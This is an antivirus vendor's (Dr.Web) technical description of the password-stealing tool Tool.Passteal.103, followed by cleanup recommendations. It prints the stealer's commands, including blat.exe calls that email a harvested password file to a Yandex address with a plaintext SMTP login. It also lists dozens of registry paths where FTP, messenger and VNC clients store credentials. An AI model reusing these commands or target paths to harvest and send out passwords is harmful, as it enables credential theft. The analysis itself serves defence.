Підтримка
Цілодобова підтримка | Правила звернення

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Поширені запитання |  Форум |  Бот самопідтримки Telegram

Ваші запити

  • Всі: -
  • Незакриті: -
  • Останій: -

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Зв'яжіться з нами Незакриті запити: 

Профіль

Профіль

Tool.Passteal.103

Добавлен в вирусную базу Dr.Web: 2014-06-13

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
  • [<HKLM>\SOFTWARE\Classes\mprf\shell\open\command] '' = '<Текущая директория>\MPR.exe "%1"'
Вредоносные функции:
Создает и запускает на исполнение:
  • '<Текущая директория>\blat.exe' -body PassReg -to nikolai.sitnickow-psu@yandex.ru -attach pass.mpf
  • '<Текущая директория>\MPR.exe' /export
  • '<Текущая директория>\blat.exe' -install -server smtp.yandex.ru -port 587 -f nikolai.sitnickow-psu@yandex.ru -u nikolai.sitnickow-psu -pw 1164478a
Запускает на исполнение:
  • '<SYSTEM32>\ping.exe' ya.ru -n 5
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\1.bat" "
Ищет ветки реестра, отвечающие за хранение паролей сторонними программами:
  • [<HKCU>\Software\South River Technologies\WebDrive\Connections]
  • [<HKCU>\Software\Martin Prikryl\WinSCP 2\Sessions]
  • [<HKLM>\SOFTWARE\Miranda]
  • [<HKCU>\Software\Microsoft\MSNMessenger]
  • [<HKCU>\SOFTWARE\Mirabilis\ICQ\NewOwners]
  • [<HKCU>\Software\Sota\FFFTP\Options]
  • [<HKCU>\Software\BPFTP]
  • [<HKCU>\Software\CoffeeCup Software\Internet\Profiles]
  • [<HKCU>\Software\FTP Explorer\Profiles]
  • [<HKCU>\Software\FTPWare\COREFTP\Sites]
  • [<HKCU>\Software\Paltalk]
  • [<HKCU>\Software\Google\Google Talk\Accounts]
  • [<HKCU>\Software\AIM\AIMPro]
  • [<HKCU>\Software\ORL\WinVNC3]
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian]
  • [<HKCU>\Identities\{5518F2FB-DB74-45A3-BEC1-4575D8D9DC84}\Software\Microsoft\MessengerService]
  • [<HKCU>\Software\Microsoft\MessengerService]
  • [<HKCU>\Software\Yahoo\Pager]
  • [<HKCU>\Software\America Online\AIM6\Passwords]
  • [<HKCU>\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users]
  • [<HKLM>\Software\Ghisler\Windows Commander]
  • [<HKCU>\Software\Ghisler\Total Commander]
  • [<HKLM>\Software\Ghisler\Total Commander]
  • [<HKCU>\Software\FlashFXP]
  • [<HKCU>\Software\FlashFXP\3]
  • [<HKCU>\SOFTWARE\Far2\Plugins\FTP\Hosts]
  • [<HKCU>\SOFTWARE\Far\Plugins\FTP\Hosts]
  • [<HKCU>\Software\Far\SavedDialogHistory\FTPHost]
  • [<HKCU>\Software\Ghisler\Windows Commander]
  • [<HKCU>\Software\Far2\SavedDialogHistory\FTPHost]
  • [<HKCU>\Software\BPFTP\Bullet Proof FTP\Main]
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FTP Commander Deluxe]
  • [<HKCU>\Software\BulletProof Software\BulletProof FTP Client\Main]
  • [<HKCU>\Software\BulletProof Software\BulletProof FTP Client\Options]
  • [<HKCU>\Software\BPFTP\Bullet Proof FTP\Options]
  • [<HKLM>\Software\FlashFXP]
  • [<HKLM>\Software\FlashFXP\3]
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FTP Commander Pro]
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FTP Commander]
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FTP Navigator]
Изменения в файловой системе:
Создает следующие файлы:
  • <Текущая директория>\mpr.ini
  • <Текущая директория>\MPR.exe
  • <Текущая директория>\SAV_CRNJEUFU_4.22.2014_4-41-19_PM.mpf
  • <Текущая директория>\block_reader.sys
  • <Текущая директория>\HookLib.dll
  • <Текущая директория>\blat.exe
  • %TEMP%\1.tmp\1.bat
  • <Текущая директория>\blat.dll
  • <Текущая директория>\blat.lib
Удаляет следующие файлы:
  • <Текущая директория>\MPR.exe
  • <Текущая директория>\mpr.ini
  • <Текущая директория>\block_reader.sys
  • <Текущая директория>\HookLib.dll
  • <Текущая директория>\blat.exe
  • <Текущая директория>\blat.lib
  • <Текущая директория>\blat.dll
Перемещает следующие файлы:
  • <Текущая директория>\SAV_CRNJEUFU_4.22.2014_4-41-19_PM.mpf в <Текущая директория>\pass.mpf
Сетевая активность:
Подключается к:
  • '93.##8.134.11':587
UDP:
  • DNS ASK sm##.yandex.ru
  • DNS ASK ya.ru
Другое:
Ищет следующие окна:
  • ClassName: 'MS_WebcheckMonitor' WindowName: '(null)'
  • ClassName: 'Shell_TrayWnd' WindowName: '(null)'
  • ClassName: 'TMainMPRForm' WindowName: '(null)'
  • ClassName: 'MS_AutodialMonitor' WindowName: '(null)'

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке